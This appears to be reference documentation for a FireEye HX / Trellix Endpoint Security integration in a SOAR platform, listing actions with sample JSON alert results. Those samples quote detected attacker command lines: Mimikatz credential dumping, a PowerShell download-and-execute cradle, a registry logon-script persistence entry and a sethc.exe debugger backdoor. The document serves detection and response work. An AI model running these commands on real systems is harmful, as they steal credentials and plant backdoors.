FireEye HX

Integration version: 17.0

Configure FireEye HX integration in Google Security Operations SOAR

For detailed instructions on how to configure an integration in Google Security Operations SOAR, see Configure integrations.

Integration parameters

Use the following parameters to configure the integration:

Parameter Display Name Type Default Value Is Mandatory Description
Instance Name String N/A No Name of the Instance you intend to configure integration for.
Description String N/A No Description of the Instance.
Server String https://x.x.x.x:<port> Yes Address of the Trellix Endpoint Security instance.
Username String N/A Yes The email address of the user which should be used to connect to Trellix Endpoint Security.
Password Password N/A Yes The password of the according user.
Verify SSL Checkbox Checked No Use this checkbox, if your Trellix Endpoint Security connection requires an SSL verification (checked by default).
Run Remotely Checkbox Unchecked No Check the field in order to run the configured integration remotely. Once checked, the option appears to select the remote user (agent).


Cancel Host Contain


Create a cancel host that contains a task on the Trellix Endpoint Security server based on the Google Security Operations SOAR IP or host Google Security Operations SOAR entities.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result

Contain Host


Create contain host task on the Trellix Endpoint Security server based on the Google Security Operations SOAR IP or host Google Security Operations SOAR entities.


Parameter Type Default Value Is Mandatory Description
Approve Containment Checkbox Unchecked No Specify if a containment request for the host should be automatically approved to create a contain host task on the Trellix Endpoint Security server. If it's not approved automatically, a containment request can be approved in Trellix Endpoint Security web console.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result

Get Alerts


Get Trellix Endpoint Security alerts based on the provided Google Security Operations SOAR entity and search conditions. The action works on the host or IP Google Security Operations SOAR entities.


Parameter Display Name Type Default Value Is Mandatory Description
Limit Integer N/A No How many alerts the action should return for example, 100.
Has Share Mode Drop Down List _(default = any)_ _default = any_ No Filter alerts that were triggered from indicators with specific share mode. _Available values: any, restricted and, unrestricted._
Alert Resolution Status Drop Down List _(default = any)_ _default = any_ No Filter alerts based on alert resolution status. Available values: _any, active_threat, alert, block, partial_block._
Alert Reported in Last x Hours Integer N/A No Filter alerts reported in the last x hours, for example, last 4 hours.
Alert Source Drop Down List _(default = any)_ _default = any_ No

Source of alert. Available values: any, exd (exploit detection), mal (malware alert), ioc (indicator of compromise).

Condition ID String N/A No Filter alerts by a specific condition identifier.
Alert ID String N/A No Return a specific alert by the alert identifier.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
        "EntityResult": [{
            "indicator": {
                "category": "Mandiant",
                "url": "/hx/api/v3/indicators/mandiant/b7eae353_be50_44cf_8773_7067e9c66d7b",
                "signature": null,
                "_id": "b7eae353-be50-44cf-8773-7067e9c66d7b",
                "uri_name": "b7eae353-be50-44cf-8773-7067e9c66d7b"
            "event_id": 12880,
            "event_values": {
                "processEvent/processCmdLine": "at  13:00 \\\"C:\\\\TMP\\\\mim.exe sekurlsa::LogonPasswords > C:\\\\TMP\\\\o.txt\\\"",
                "processEvent/parentPid": 4832,
                "processEvent/md5": "e2a9c62b47f64525f7eb0cb8d637ff90",
                "processEvent/processPath": "C:\\\\Windows\\\\System32\\\\at.exe",
                "processEvent/parentProcess": "cmd.exe",
                "processEvent/timestamp": "2020-05-29T10:21:03.419Z",
                "processEvent/startTime": "2020-05-29T10:21:03.419Z",
                "processEvent/process": "at.exe",
                "processEvent/username": "DOMAIN-COM\\\\Administrator",
                "processEvent/pid": 7332,
                "processEvent/parentProcessPath": "C:\\\\Windows\\\\System32\\\\cmd.exe",
                "processEvent/eventType": "start"
            "event_type": "processEvent",
            "subtype": null,
            "reported_at": "2020-05-29T10:24:05.410Z",
            "decorators": [],
            "md5values": ["e2a9c62b47f64525f7eb0cb8d637ff90"],
            "appliance": {
                "_id": "86B7F11ACF8D"
            "agent": {
                "url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
                "_id": "FqNP4ybCdrlfVqG3lrCvRP",
                "containment_state": "normal"
            "is_false_positive": false,
            "event_at": "2020-05-29T10:21:03.419Z",
            "source": "IOC",
            "matched_at": "2020-05-29T10:23:22.000Z",
            "decorator_statuses": [],
            "url": "/hx/api/v3/alerts/88",
            "_id": 88,
            "resolution": "ALERT",
            "condition": {
                "url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA==",
                "_id": "yirelRwhiuXlF0bQhTL4GA=="
            "matched_source_alerts": []
        "Entity": "PC-01"

Get Alert Group Details


Get full alert group details for provided Alert Group by its ID.


Parameter Display Name Type Default Value Is Mandatory Description
Alert Groups ID String N/A Yes Specify a comma-separated list of Alert Group IDs for which you want to retrieve details.

Run On

This action doesn't run on entities, it has a mandatory input parameter.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
    "details": [],
    "route": "/hx/api/v3/alert_groups/id",
    "data": {
        "_id": "622d3688031aa40faa4bd86028841276",
        "assessment": "[Process reg.exe started] MIMIKATZ SUSPICIOUS PROCESS ARGUMENTS (METHODOLOGY)",
        "file_full_path": "C:\\Windows\\System32\\reg.exe",
        "first_event_at": "2020-08-06T06:32:55.761Z",
        "last_event_at": "2020-08-06T06:32:55.761Z",
        "dispositions": [],
        "source": "IOC",
        "has_fp_disposition": false,
        "last_alert": {
            "_id": 729,
            "agent": {
                "_id": "QKQ0SinOZUbehz5AgFXQhX",
                "url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
                "hostname": "HW-HOST-024",
                "containment_state": "normal"
            "condition": {
                "_id": "yirelRwhiuXlF0bQhTL4GA==",
                "url": "/hx/api/v3/conditions/yirelRwhiuXlF0bQhTL4GA=="
            "event_at": "2020-08-06T06:32:55.761+00:00",
            "matched_at": "2020-08-06T06:37:55+00:00",
            "reported_at": "2020-12-18T14:03:18.856+00:00",
            "source": "IOC",
            "resolution": "ALERT",
            "decorators": [],
            "md5values": [
            "decorator_sources": [],
            "decorator_statuses": [],
            "url": "/hx/api/v3/alerts/729",
            "event_id": 207,
            "event_type": "processEvent",
            "event_values": {
                "processEvent/timestamp": "2020-08-06T06:32:55.761Z",
                "processEvent/eventType": "start",
                "processEvent/pid": 10356,
                "processEvent/processPath": "C:\\Windows\\System32\\reg.exe",
                "processEvent/process": "reg.exe",
                "processEvent/parentPid": 9456,
                "processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
                "processEvent/parentProcess": "cmd.exe",
                "processEvent/username": "FIREEYE-LAB\\Administrator",
                "processEvent/startTime": "2020-08-06T06:32:55.761Z",
                "processEvent/md5": "05cf3ce225b05b669e3118092f4c8eab",
                "processEvent/processCmdLine": "REG  ADD HKCU\\Environment /f /v UserInitMprLogonScript /t REG_MULTI_SZ /d \"C:\\TMP\\mim.exe sekurlsa::LogonPasswords > C:\\TMP\\o.txt\""
            "is_false_positive": false
        "generic_alert_badge": null,
        "generic_alert_label": null,
        "stats": {
            "events": 1
        "url": "/hx/api/v3/alert_groups/622d3688031aa40faa4bd86028841276",
        "created_at": "2020-12-18T14:03:24.535Z",
        "acknowledgement": {
            "acknowledged": false,
            "acknowledged_by": null,
            "acknowledged_time": null,
            "comment": null,
            "comment_update_time": null
        "grouped_by": {
            "condition_id": "yirelRwhiuXlF0bQhTL4GA==",
            "detected_by": "ioc_engine",
            "host": {
                "_id": "QKQ0SinOZUbehz5AgFXQhX",
                "url": "/hx/api/v3/hosts/QKQ0SinOZUbehz5AgFXQhX",
                "hostname": "HW-HOST-024",
                "primary_ip_address": ""
    "message": "OK"
Case Wall
Result type Value/Description Type
Output message*

Success for 1 (is_success=true): Successfully retrieved details about the following alert groups in Trellix Endpoint Security: {alert group ids}

Unsuccess for 1 (is_success=true): Action wasn't able to retrieve details about the following alert groups in Trellix Endpoint Security: {alert group ids}

Unsuccess for all (is_success=false): None of the provided alert groups were found in Trellix Endpoint Security.

Case Wall

Name: Alert Group Details


  • Assessment
  • Alert Group ID
  • First Event
  • Last Event
  • Acknowledged
  • Last Alert HX ID

Get Alerts in Alert Group


Get all the alerts found in the specified alert group


Parameter Display Name Type Default Value Is Mandatory Description
Alert Group ID String N/A Yes Specify a comma-separated list of Alert Group IDs for which you want to retrieve details.
Limit Integer 50 No Specify the maximum amount of alerts listings coming back from the API, for the alert group. Default is 50.

Run On

This action doesn't run on entities, it has a mandatory input parameter.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
    "data": {
        "total": 2,
        "query": {},
        "sort": {},
        "offset": 0,
        "limit": 50,
        "entries": [
                "_id": 712,
                "agent": {
                    "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                    "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                    "containment_state": "normal"
                "condition": {
                    "_id": "2npvcLf_arxPaH717hQZ9g==",
                    "url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
                "indicator": {
                    "_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
                    "url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
                    "name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
                    "uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
                    "display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
                    "signature": null,
                    "category": "Mandiant"
                "event_at": "2020-12-10T08:04:09.521Z",
                "matched_at": "2020-12-10T08:04:43.000Z",
                "reported_at": "2020-12-10T08:04:49.607Z",
                "source": "IOC",
                "subtype": null,
                "matched_source_alerts": [],
                "resolution": "ALERT",
                "is_false_positive": false,
                "decorators": [],
                "md5values": [],
                "decorator_statuses": [],
                "url": "/hx/api/v3/alerts/712",
                "event_id": 853899,
                "event_type": "regKeyEvent",
                "event_values": {
                    "regKeyEvent/timestamp": "2020-12-10T08:04:09.521Z",
                    "regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
                    "regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
                    "regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
                    "regKeyEvent/eventType": 1,
                    "regKeyEvent/pid": 8800,
                    "regKeyEvent/process": "reg.exe",
                    "regKeyEvent/processPath": "C:\\Windows\\System32",
                    "regKeyEvent/valueName": "Debugger",
                    "regKeyEvent/valueType": "REG_SZ",
                    "regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
                    "regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
                    "regKeyEvent/username": "FIREEYE-LAB\\Administrator"
                "appliance": {
                    "_id": "86B7F11ACF8D"
                "_id": 723,
                "agent": {
                    "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                    "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                    "containment_state": "normal"
                "condition": {
                    "_id": "2npvcLf_arxPaH717hQZ9g==",
                    "url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
                "indicator": {
                    "_id": "f0e49db2-1c28-4529-a426-73251d92de7d",
                    "url": "/hx/api/v3/indicators/mandiant/f0e49db2_1c28_4529_a426_73251d92de7d",
                    "name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
                    "uri_name": "f0e49db2-1c28-4529-a426-73251d92de7d",
                    "display_name": "EASE OF ACCESS BACKDOORS (METHODOLOGY)",
                    "signature": null,
                    "category": "Mandiant"
                "event_at": "2020-12-10T09:26:14.114Z",
                "matched_at": "2020-12-10T09:26:56.000Z",
                "reported_at": "2020-12-10T09:27:08.735Z",
                "source": "IOC",
                "subtype": null,
                "matched_source_alerts": [],
                "resolution": "ALERT",
                "is_false_positive": false,
                "decorators": [],
                "md5values": [],
                "decorator_statuses": [],
                "url": "/hx/api/v3/alerts/723",
                "event_id": 880771,
                "event_type": "regKeyEvent",
                "event_values": {
                    "regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
                    "regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
                    "regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
                    "regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
                    "regKeyEvent/eventType": 1,
                    "regKeyEvent/pid": 8740,
                    "regKeyEvent/process": "reg.exe",
                    "regKeyEvent/processPath": "C:\\Windows\\System32",
                    "regKeyEvent/valueName": "Debugger",
                    "regKeyEvent/valueType": "REG_SZ",
                    "regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
                    "regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
                    "regKeyEvent/username": "FIREEYE-LAB\\Administrator"
                "appliance": {
                    "_id": "86B7F11ACF8D"
    "message": "OK",
    "details": [],
    "route": "/hx/api/v3/alert_groups/group_id/alerts"
Case Wall
Result type Value/Description Type
Output message*

Success for 1 (is_success=true): Successfully retrieved details about the following alert groups in Trellix Endpoint Security: {alert group ids}

Unsuccess for 1 (is_success=true): Action wasn't able to retrieve details about the following alert groups in Trellix Endpoint Security: {alert group ids}

Unsuccess for all (is_success=false): None of the provided alert groups were found in Trellix Endpoint Security.

Case Wall

Name: "Trellix Endpoint Security Alert Group +{alert_group_id) Alerts"


  • Alert Trellix Endpoint Security ID
  • Indicator Name
  • Event Time
  • Matched Time
  • Reported Time
  • Source
  • Event Type

Get Host Info


Enrich Google Security Operations SOAR Host or IP entities based on the information from the Trellix Endpoint Security.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
        "EntityResult": {
            "last_alert": {
                "url": "/hx/api/v3/alerts/254",
                "_id": 254
            "domain": "EXAMPLE-COM",
            "last_exploit_block_timestamp": null,
            "containment_state": "normal",
            "timezone": "\\u05e9\\u05e2\\u05d5\\u05df \\u05e7\\u05d9\\u05e5 \\u05d9\\u05e8\\u05d5\\u05e9\\u05dc\\u05d9\\u05dd",
            "gmt_offset_seconds": 10800,
            "initial_agent_checkin": "2020-05-29T10:11:12.022Z",
            "stats": {
                "alerting_conditions": 10,
                "exploit_alerts": 0,
                "acqs": 4,
                "malware_false_positive_alerts": 0,
                "alerts": 10,
                "exploit_blocks": 0,
                "false_positive_alerts": 0,
                "malware_cleaned_count": 0,
                "malware_alerts": 0,
                "false_positive_alerts_by_source": {},
                "generic_alerts": 0,
                "malware_quarantined_count": 0
            "primary_mac": "00-50-56-11-22-33",
            "hostname": "HW-HOST-025",
            "primary_ip_address": "",
            "last_audit_timestamp": "2020-06-01T09:10:38.752Z",
            "last_alert_timestamp": "2020-06-01T08:02:30.817+00:00",
            "containment_queued": false,
            "sysinfo": {
                "url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP/sysinfo"
            "last_exploit_block": null,
            "reported_clone": false,
            "url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
            "excluded_from_containment": false,
            "last_poll_timestamp": "2020-06-01T09:10:36.000Z",
            "last_poll_ip": "",
            "containment_missing_software": false,
            "_id": "FqNP4ybCdrlfVqG3lrCvRP",
            "os": {
                "kernel_version": null,
                "platform": "win",
                "patch_level": null,
                "bitness": "64-bit",
                "product_name": "Windows 10 Pro"
            "agent_version": "32.30.0"
        "Entity": "PC-01"

Get Indicator


Get information on a specific Indicator from Trellix Endpoint Security server.


Parameter Display Name Type Default Value Is Mandatory Description
Indicator Category String N/A Yes Specify the indicator category uri_name value. uri_name can be found by running "Get Indicators" action.
Indicator Name String N/A Yes Specify indicator uri_name value. uri_name can be found by running "Get Indicators" action.

Run On

This action runs on all entities.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
    "category": {
        "url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
        "_id": 7,
        "uri_name": "mandiant_unrestricted",
        "name": "Mandiant Unrestricted Intel",
        "share_mode": "unrestricted"
    "display_name": "FIREEYE END2END TEST",
    "description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
    "create_actor": {
        "username": "mandiant",
        "_id": 3
    "active_since": "2020-05-28T13:08:08.513Z",
    "url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
    "_revision": "20200528130929238120103414",
    "create_text": "General_Windows_unrestricted_2020.05.270833",
    "created_by": "General_Windows_unrestricted_2020.05.270833",
    "update_actor": {
        "username": "mandiant",
        "_id": 3
    "meta": null,
    "signature": null,
    "platforms": ["win\", \"osx\", \"linux"],
    "stats": {
        "source_alerts": 0,
        "alerted_agents": 1,
        "active_conditions": 7
    "_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
    "uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
    "name": "FIREEYE END2END TEST"

Get Indicators


Get information on indicators of compromise (IOC) from Trellix Endpoint Security server based on provided search parameters.


Parameter Display Name Type Default Value Is Mandatory Description
Indicator Category String N/A No The indicator category.
Search Term String N/A No The search term can be any name, category, signature, source, or condition value.
Limit String N/A No How many indicators action should return, for example, 100.
Share Mode Drop Down List _(default = any)_ _default = any_ No Filter indicators based on specific share mode. _Available values: any, restricted, unrestricted._
Sort by Field String N/A No Sorts the results by the specified field in ascending order.
Created by String N/A No Filter indicators based on author.
Has associated alerts Checkbox N/A No Specify if only indicators, which have associated alerts should be returned.

Run On

This action runs on all entities.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
        "category": {
            "url": "/hx/api/v3/indicator_categories/mandiant_unrestricted",
            "_id": 7,
            "uri_name": "mandiant_unrestricted",
            "name": "Mandiant Unrestricted Intel",
            "share_mode": "unrestricted"
        "display_name": "FIREEYE END2END TEST",
        "description": "IOC used for testing HX appliances and content packages to ensure that things work end to end",
        "create_actor": {
            "username": "mandiant",
            "_id": 3
        "active_since": "2020-05-28T13:08:08.513Z",
        "url": "/hx/api/v3/indicators/mandiant_unrestricted/2b4753b0_9972_477e_ba16_1a7c29058cee",
        "_revision": "20200528130929238120103414",
        "create_text": "General_Windows_unrestricted_2020.05.270833",
        "created_by": "General_Windows_unrestricted_2020.05.270833",
        "update_actor": {
            "username": "mandiant",
            "_id": 3
        "meta": null,
        "signature": null,
        "platforms": ["win", "osx", "linux"],
        "stats": {
            "source_alerts": 0,
            "alerted_agents": 1,
            "active_conditions": 7
        "_id": "2b4753b0-9972-477e-ba16-1a7c29058cee",
        "uri_name": "2b4753b0-9972-477e-ba16-1a7c29058cee",
        "name": "FIREEYE END2END TEST"

Get List of File Acquisitions for Host


Get a list of file acquisitions requested for the host from Trellix Endpoint Security server. The action works on host or IP Google Security Operations SOAR entities.


Parameter Display Name Type Default Value Is Mandatory Description
Search Term String N/A No Searches all file acquisitions for hosts connected to the Trellix Endpoint Security server. The search_term can be any condition value.
Limit String N/A No How many records the action should return, for example, 100.
Filter Field String N/A No Lists only results with the specified field value, results can be filtered by external correlation identifier (external_id).

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
        "EntityResult": [{
            "comment": " ",
            "zip_passphrase": "unzip-me",
            "indicator": {
                "url": null,
                "_id": "FqNP4ybCdrlfVqG3lrCvRP"
            "request_actor": {
                "username": "admin",
                "_id": 1000
            "request_time": "2020-06-01T08:43:14.000Z",
            "finish_time": "2020-06-01T08:46:39.156Z",
            "_revision": "20200601084639156575147403",
            "error_message": "The acquisition completed with issues.",
            "req_use_api": false,
            "alert": {
                "url": null,
                "_id": "FqNP4ybCdrlfVqG3lrCvRP"
            "url": "/hx/api/v3/acqs/files/9",
            "state": "COMPLETE",
            "host": {
                "url": "/hx/api/v3/hosts/FqNP4ybCdrlfVqG3lrCvRP",
            "req_filename": "reg.exe",
            "req_path": "C:\\\\Windows\\\\System32",
            "_id": 9,
            "external_id": null,
            "condition": {
                "url": null,
                "_id": "FqNP4ybCdrlfVqG3lrCvRP"
            "md5": "601bddf7691c5af626a5719f1d7e35f1"
        "Entity": "PC-01"

Is Contain Malware Alerts


Check if malware alerts are listed for provided Google Security Operations SOAR Host or IP entities on Trellix Endpoint Security server.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
        "EntityResult": {
            "alerting_conditions": 10,
            "exploit_alerts": 0,
            "acqs": 4,
            "malware_false_positive_alerts": 0,
            "alerts": 10,
            "exploit_blocks": 0,
            "false_positive_alerts": 0,
            "malware_cleaned_count": 0,
            "malware_alerts": 0,
            "false_positive_alerts_by_source": {},
            "generic_alerts": 0,
            "malware_quarantined_count": 0
        "Entity": "PC-01"



Test connectivity to the Trellix Endpoint Security server with parameters provided at the integration configuration page in the Google Security Operations Marketplace tab.

Run On

This action runs on all entities.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result

Acknowledge Alert Groups


Acknowledge alert groups handled by Google Security Operations SOAR to better sync between HX platform and Google Security Operations SOAR.


Parameter Display Name Type Default Value Is Mandatory Description
Alert Groups IDs Comma separated list N/A Yes Specify the Alert Groups IDs you would like to Acknowledge, in a comma separated list.
Acknowledgment DDL Acknowledge Yes Specify whether you would like to Acknowledge or Un-acknowledge the specified alert groups.
Acknowledgment Comment String N/A No Specify the acknowledgment comment you would like to add to the relevant alert groups.
Limit Integer N/A No Specify the maximum amount of alert group listings coming back from the API, in the JSON result.

Run On

This action doesn't run on entities, it has a mandatory input parameter.

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
    "data": {
        "total": 2,
        "query": {},
        "sort": {},
        "offset": 0,
        "limit": 50,
        "entries": [
                "_id": "4532f4d8d50ab50a7830e2823ac488fd",
                "assessment": "[Process powershell.exe started] POWERSHELL DOWNLOADER (METHODOLOGY)",
                "file_full_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                "first_event_at": "2020-08-17T12:03:38.496Z",
                "last_event_at": "2020-12-10T08:02:22.561Z",
                "dispositions": [],
                "source": "IOC",
                "has_fp_disposition": false,
                "last_alert": {
                    "_id": 718,
                    "agent": {
                        "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                        "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                        "hostname": "HW-HOST-FY01",
                        "containment_state": "normal"
                    "condition": {
                        "_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
                        "url": "/hx/api/v3/conditions/yQjMv_j5PKfjL8Qu5uSm4A=="
                    "event_at": "2020-08-17T12:03:38.496+00:00",
                    "matched_at": "2020-12-10T09:26:55+00:00",
                    "reported_at": "2020-12-10T09:27:08.624+00:00",
                    "source": "IOC",
                    "resolution": "ALERT",
                    "decorators": [],
                    "md5values": [
                    "decorator_sources": [],
                    "decorator_statuses": [],
                    "url": "/hx/api/v3/alerts/718",
                    "event_id": 39882,
                    "event_type": "processEvent",
                    "event_values": {
                        "processEvent/timestamp": "2020-08-17T12:03:38.496Z",
                        "processEvent/eventType": "start",
                        "processEvent/pid": 9896,
                        "processEvent/processPath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                        "processEvent/process": "powershell.exe",
                        "processEvent/parentPid": 5560,
                        "processEvent/parentProcessPath": "C:\\Windows\\System32\\cmd.exe",
                        "processEvent/parentProcess": "cmd.exe",
                        "processEvent/username": "FIREEYE-LAB\\Administrator",
                        "processEvent/startTime": "2020-08-17T12:03:38.496Z",
                        "processEvent/md5": "cda48fc75952ad12d99e526d0b6bf70a",
                        "processEvent/processCmdLine": "powershell.exe  \"iex (New-Object Net.WebClient).DownloadString('');Invoke-Mimikatz -DumpCreds\" "
                    "is_false_positive": false
                "generic_alert_badge": null,
                "generic_alert_label": null,
                "stats": {
                    "events": 3
                "url": "/hx/api/v3/alert_groups/4532f4d8d50ab50a7830e2823ac488fd",
                "created_at": "2020-12-10T09:26:56.056Z",
                "acknowledgement": {
                    "acknowledged": true,
                    "acknowledged_by": "test2",
                    "acknowledged_time": "2020-12-22T19:00:25.688Z",
                    "comment": "test comment",
                    "comment_update_time": "2020-12-22T19:00:25.688Z"
                "grouped_by": {
                    "condition_id": "yQjMv_j5PKfjL8Qu5uSm4A==",
                    "detected_by": "ioc_engine",
                    "host": {
                        "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                        "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                        "hostname": "HW-HOST-FY01",
                        "primary_ip_address": ""
                "_id": "e9f4d7baaa362d9d5d0b6e053ba0d44d",
                "assessment": "[Registry key event] EASE OF ACCESS BACKDOORS (METHODOLOGY)",
                "file_full_path": "",
                "first_event_at": "2020-12-10T08:04:09.521Z",
                "last_event_at": "2020-12-10T09:26:14.114Z",
                "dispositions": [],
                "source": "IOC",
                "has_fp_disposition": false,
                "last_alert": {
                    "_id": 723,
                    "agent": {
                        "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                        "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                        "hostname": "HW-HOST-FY01",
                        "containment_state": "normal"
                    "condition": {
                        "_id": "2npvcLf_arxPaH717hQZ9g==",
                        "url": "/hx/api/v3/conditions/2npvcLf_arxPaH717hQZ9g=="
                    "event_at": "2020-12-10T09:26:14.114+00:00",
                    "matched_at": "2020-12-10T09:26:56+00:00",
                    "reported_at": "2020-12-10T09:27:08.735+00:00",
                    "source": "IOC",
                    "resolution": "ALERT",
                    "decorators": [],
                    "md5values": [],
                    "decorator_sources": [],
                    "decorator_statuses": [],
                    "url": "/hx/api/v3/alerts/723",
                    "event_id": 880771,
                    "event_type": "regKeyEvent",
                    "event_values": {
                        "regKeyEvent/timestamp": "2020-12-10T09:26:14.114Z",
                        "regKeyEvent/hive": "HKEY_LOCAL_MACHINE\\SOFTWARE",
                        "regKeyEvent/keyPath": "Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe",
                        "regKeyEvent/path": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\\Debugger",
                        "regKeyEvent/eventType": 1,
                        "regKeyEvent/pid": 8740,
                        "regKeyEvent/process": "reg.exe",
                        "regKeyEvent/processPath": "C:\\Windows\\System32",
                        "regKeyEvent/valueName": "Debugger",
                        "regKeyEvent/valueType": "REG_SZ",
                        "regKeyEvent/value": "QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGMAbQBkAC4AZQB4AGUAAAA=",
                        "regKeyEvent/text": "C:\\Windows\\System32\\cmd.exe",
                        "regKeyEvent/username": "FIREEYE-LAB\\Administrator"
                    "is_false_positive": false
                "generic_alert_badge": null,
                "generic_alert_label": null,
                "stats": {
                    "events": 2
                "url": "/hx/api/v3/alert_groups/e9f4d7baaa362d9d5d0b6e053ba0d44d",
                "created_at": "2020-12-10T08:04:54.740Z",
                "acknowledgement": {
                    "acknowledged": true,
                    "acknowledged_by": "test2",
                    "acknowledged_time": "2020-12-22T19:00:25.688Z",
                    "comment": "test comment",
                    "comment_update_time": "2020-12-22T19:00:25.688Z"
                "grouped_by": {
                    "condition_id": "2npvcLf_arxPaH717hQZ9g==",
                    "detected_by": "ioc_engine",
                    "host": {
                        "_id": "9GJe9n4Ynd5dFtZ8wCjIu7",
                        "url": "/hx/api/v3/hosts/9GJe9n4Ynd5dFtZ8wCjIu7",
                        "hostname": "HW-HOST-FY01",
                        "primary_ip_address": ""
    "message": "OK",
    "details": [],
    "route": "/hx/api/v3/alert_groups"
Case Wall
Result type Value/Description Type
Output message*

The action should not fail nor stop a playbook execution:
if successful: If (total) equals (number of alert group ids) -

"Successfully updated acknowledgement status for all alert groups"

If some successful and some not: (number of IDs provided is bigger then total) - "Successfully fetched alerts for the following alert group IDs: {succesfull_alert_groups_ids}"
"Couldn't fetch alerts for the following alert group IDs: {not_succesfull_slert_group_ids}"

If no alert group details were fetched:

"Couldn't fetch alerts for any provided alert group ID. Please check the provided IDs and try again"

The action should fail and stop a playbook execution:
if not successful: "Failed to execute action "Get Alerts In Alerts Group" (exception.stacktrace)


Get Host Alert Groups


List alert groups related to a host in Trellix Endpoint Security. Supported entities: Hostname, IP Address.


Parameter Display Name Type Default Value Is Mandatory Description
Acknowledgment Filter DDL


Only Acknowledged

Only Unacknowledged

No Specify whether you want to return all of the alert groups or only acknowledged/unacknowledged.
Max Alert Groups To Return Integer 20 No Specify how many Alert Groups to return per entity. Default: 20.

Run On

This action runs on the following entities:

  • IP Address
  • Hostname

Action Results

Script Result
Script Result Name Value Options Example
is_success True/False is_success:False
JSON Result
    "_id": "6d9a68f2a78f8d983bd3c0f4556785e6",
    "assessment": "[Heur.BZC.ONG.Cheetah.3.1C89233F]",
    "file_full_path": "C:\\Users\\Administrator\\Downloads\\APTSimulator-master\\APTSimulator-master\\build\\test-sets\\defense-evasion\\js-dropper.bat",
    "first_event_at": "2021-07-01T09:44:18.809Z",
    "last_event_at": "2021-07-01T09:44:18.809Z",
    "dispositions": [],
    "source": "MAL",
    "has_fp_disposition": false,
    "last_alert": {
        "_id": 812,
        "agent": {
            "_id": "JS2asEbMWGgfxT0aHVu034",
            "url": "/hx/api/v3/hosts/JS2asEbMWGgfxT0aHVu034",
